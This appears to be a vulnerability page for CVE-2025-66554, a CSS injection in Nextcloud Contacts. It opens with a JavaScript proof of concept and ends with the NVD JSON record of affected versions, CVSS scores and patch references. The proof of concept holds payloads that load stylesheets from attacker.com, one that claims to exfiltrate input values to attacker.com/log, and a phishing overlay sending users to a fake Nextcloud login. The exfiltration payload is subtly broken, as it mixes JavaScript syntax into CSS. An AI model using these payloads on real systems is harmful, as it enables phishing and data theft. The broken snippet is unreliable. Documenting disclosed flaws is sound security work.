CVE-2025-66554

// PoC for CVE-2025-66554 - Nextcloud Contacts CSS Injection // Attack vector: Modify organisation or title field to inject CSS // Step 1: Attacker modifies their contact profile const maliciousPayload = ` <style> @import url('https://attacker.com/malicious.css'); </style> `; // Alternative payload using link tag const altPayload = ` <link rel="stylesheet" href="https://attacker.com/malicious.css"> `; // CSS exfiltration example const cssExfilPayload = ` <style> input[value] { background-image: url('https://attacker.com/log?c=' + encodeURIComponent(value)); } </style> `; // Example malicious.css content: /* body::after { content: "Your session has expired. Please login again at https://fake-nextcloud.com"; position: fixed; top: 0; left: 0; right: 0; bottom: 0; background: rgba(0,0,0,0.8); color: white; font-size: 24px; display: flex; justify-content: center; align-items: center; z-index: 999999; } */ console.log('CSS Injection PoC for Nextcloud Contacts'); console.log('Payload should be placed in organisation or title field');

{"cve": {"id": "CVE-2025-66554", "sourceIdentifier": "[email protected]", "published": "2025-12-05T18:15:58.630", "lastModified": "2025-12-09T17:01:51.250", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Contacts app for Nextcloud easily syncs contacts from various devices with your Nextcloud and allows editing. Prior to 5.5.4, 6.0.6, and 7.2.5, a malicious user was able to modify their organisation and title field to load additional CSS files. Javascript and other options were correctly blocked by the content security policy of the Nextcloud Server code. This vulnerability is fixed in 5.5.4, 6.0.6, and 7.2.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:contacts:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndExcluding": "5.5.4", "matchCriteriaId": "6A41922A-22BB-43D6-8BA3-7D74D15A3F1D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:contacts:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0", "versionEndExcluding": "6.0.6", "matchCriteriaId": "0F4DE317-1CA4-4D75-914D-DF7F1E1A61F1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:contacts:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.2.5", "matchCriteriaId": "895F9715-619F-4ACB-B34E-8DF2383BA604"}]}]}], "references": [{"url": "https://github.com/nextcloud/contacts/commit/d954d098978dde1f121600e8b994e02f293c68b1", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/nextcloud/contacts/pull/4619", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/nextcloud/security-advisories/security/advisories/GHSA-9v78-cpfc-v6h2", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://hackerone.com/reports/3293290", "source": "[email protected]", "tags": ["Permissions Required", "Vendor Advisory"]}]}}